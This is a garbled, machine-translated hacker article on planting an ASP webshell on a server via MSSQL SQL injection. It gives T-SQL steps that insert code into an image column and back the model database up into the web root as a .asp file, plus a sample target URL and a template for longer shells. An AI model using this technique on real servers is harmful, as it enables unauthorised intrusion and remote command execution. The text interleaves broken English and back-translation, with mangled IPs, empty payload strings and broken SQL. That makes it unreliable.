This article is about how to get a webshell when SQL Injecting under MSSQL database. The method seems work well since the day I found her (July 2003). You do not need the sa privilege, just a dbowner is Okay. This is a Articles about WebShells on the MSSQL database through SQL. Since I found this vulnerability (July 2003), this method is basically effective. You must have SA permissions, as long as it is a database owner, Open Your Query Analyzer, FOLLOWING Steps Will Generate A Strange But Useable Webshell (Suppose Your Web Root Is G: / WwwTest and The Database Model Is Intact) USE MODEL Create Table CMD (STR Image); Insert INTO CMD (STR) VALUES (''); Backup Database Model To Disk = 'g: /wwtest/l.asp'; open your Query Analyzer, follow the instructions steps, You will generate a strange as a practical WebShell. (Suppose your web page is g: / wwwtes and the database model to be operated is a complete) Use model; create Table CMD (Str Image); Insert INTO CMD Str) VALUES (''); Backup Database Model to Disk = 'g: /wwwardst/l.asp' Click Run and The Database Model Has Been Backuped Into The Web Publish Directory. Download? No, Visit this file, you have got The shell ... http://202.119.9.42/l.asp?c=dir Click to run. Database Model has been released by the backup of the file. download? You get shellhttp: //202.119.9.9.9.9.42/l.asp? C = Dir Here Is The Explanation: The ASP (VB) Interpreter Will Ignore The Characters Those Not Between "", SO Naming the Backup file as .asp and visiting it WAMs NO "". by Default, The Database Stores Its Data in A "Loose" Way (Eg The Stored String "Time" Will Be Seen In The Backup File As THE Type of "T I M E"), SO The Probability That The Backup File Contains "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" If the backup file is not included, "" Naming the backup file is .asp and access it does not generate 500 errors.
Under the default, the database stores its data in a "loose" approach (for example, the stored sort "TIME" will be "T i m e" type in the backup file), so the backup file is very May be lost "". This is two premise. But how we could make it a webshell? The storage mode of image or bin type is different, the data in the backup file appear exactly the format of what we have wrote, that is, those what we insert into the table / database with the Type of Image Will Not Be Output in The "LOOSE" WAY IN THE BAKUP FILE, But The Original Format. Once Segment A Table with a Image, We Could Backup a shell! How do we construct it? What about WebShell? Mirroring and general file storage mode are different. We said that the written data backup file will be saved in the original format, so we can insert the database in the mirror type, which will not be loose in the backup file but the original type. Once we create a table with mirroring and insert some malicious code I can back up a shell. ER, Here Also Are Some Cons: 1) The Output Direct stay BE The Physical Web Directory. Usually, We can Only Guess. For virtual host, perhaps we could reveal the path in other sites and other ways.2) the database visitor should have the backup privilege. Some abnormal webmaster gave only select and insert privilege, once you meet such webmaster, abandon this way. two limitations Sex 1) The website directory must be physically used when the directory must be Usually we just want to guess. For the grateful host, we expose the path in other sites. 2) Database visitor must have the right to back up. Some metamorphosis network management will only give selection and insert permissions. Once you encounter such a color network management to abandon this method. Here are the pros:.!. 1) it will give you the webshell once your have the backup privilege A dbowner have that 2) it gives a new method of putting backdoor Suppose your database is ACCESS, and you name it .asp to prevent From Downloading. It could be a webshell;) Two points 1) It can give you Webshell, as long as you have a backup permission. The owner of a database has this permission. 2) This gives a new way to open the door.
Suppose your database is Access, name it .asp prevention, he might be a WebShell. Oh, I Nearly Forget the Most Important Thing: Data Which Are In Different Insert Phrases Are Not Tangent, That Means if Your WebShell Codes Are Too Long, You Should Do As the FOLLOW: I almost forgot the most important data in different insert statements, if your WebShell code is too long to do.
========= cut me heren ========================================================================================================================================================================== ================ Use Modelcreate Table CMD (Str Image); INSERT INTO CMD (STR) Values (''); INSERT INTO CMD (STR) VALUES ('); Insert INTO CMD (STR) VALUES (''); INSERT INTO CMD (STR) VALUES (''); INSERT INTO CMD (STR) VALUES ('); Insert INTO CMD (STR) VALUES ('); Insert Into CMD (Str) VALUES (''); INSERT INTO CMD (STR) VALUES (''); INSERT INTO CMD (STR) VALUES (''); INSERT INTO CMD (STR) VALUES (''); Insert INTO CMD (STR VALUES (''); Insert INTO CMD (STR) VALUES (''); Insert INTO CMD (STR) VALUES (''); Insert INTO CMD (STR) VALUES ('"Method =" POST ">'); INSERT INTO CMD (STR) VALUES (''); Insert INTO CMD (STR) VALUES (''); INSERT INTO CMD (STR) VALUES (''); Insert INTO CMD (STR) VALUES ('); Insert Into CMD (STR) VALUES ('); Insert INTO CMD (STR) VALUES (' '); INSERT INTO CMD (STR) VALUES (' '); Insert INTO CMD (STR) VALUES ('); Backup Database Model To Disk = 'c: /l.asp'; ========= cut me Here =========================== ===========================
To Those Who Did NOT SUCCESSFULLY GET The shell: make your testing database (e.g. Model) Intact. If there is no success, the integrity of the shell test database is not successfully obtained. To Those Who Surf on The Web: Declare @a sysname; select @ A = db_name () for the tide of those online to Those Who Thought it is too simple: try to access all file in a Similar Way;) For those who feel very simple, try to back up the log or think about how to access all files, Greets: All sst membrate. Editor: The above is for convenient English Good friends are roughly translated, below is the original text: Backup a shell] from: sst (www.0x557.org) Author: SWAN (Swan [at] 0x557 [dot] org) this article is about how to get a webshell when SQL Injecting under MSSQL database. The method seems work well since the day I found her (July 2003). You do not need the sa privilege, just a dbowner is Okay. Open your Query Analyzer, following steps will generate a strange but useable webshell (suppose your web root is g: / wwwtest and the database model is intact) use model; create table cmd (str image); insert into cmd (str) values ( ''); backup database Model to disk = 'g: /wwward/l.asp'; Click Run and The Database Model Has Been Backuped Into The Web Publish Directory. Download? NO, VI Sit this file, you have got the shell ... http://202.119.9.42/l.asp? c = dir here is the exp (vb) Interpreter Will ignore the characters those not between ", So Naming The Backup File As .asp and Visiting It Won't Cause "". by Default, The Database Stores ITS Data in A "Loose" Way (Eg The Stored String "Time" Will Be Seen In The Backup file as the type of "t i m e"), So the probability what the backup file contains ""
is low. These are two preconditions. But how we could make it a webshell? The storage mode of image or bin type is different, the data in the backup file appear exactly the format of what we have wrote, that is, those what we insert into the table / database with the type of image will NOT be output in the "loose" way in the backup file, but the original format. Once we create a table with a image segment and insert some evil codes, we could backup a shell Er, here also are some cons:!. 1) the output directort should be the physical web directory Usually, we can only guess For virtual host, perhaps we could reveal the path in other sites and other ways.2) the database. . visitor should have the backup privilege Some abnormal webmaster gave only select and insert privilege, once you meet such webmaster, abandon this way Here are the pros:. 1) it will give you the webshell once your have the backup privilege A dbowner have. That! 2) IT Gives A New Method of Putting Backdoor. Suppose you R Database IS Access, And You Name It .. It Could Be A Webshell;) 3) ... OH, I Nearly Forget The Most Important Thing: Data Which Are In Different Insert Phrases Are Not Tangent, That Means if Your Webshell Codes Are Too Long, You Should Do as The Follow: ========= Cut me Here ======================= ================================ uE modelcreate Table CMD (Str Image); Insert INTO CMD (STR) VALUES (' '); INSERT INTO CMD (STR) VALUES (' ');
